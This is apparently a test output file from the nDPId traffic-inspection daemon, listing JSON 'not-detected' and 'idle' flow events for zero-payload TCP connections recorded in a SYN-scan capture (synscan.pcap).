-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
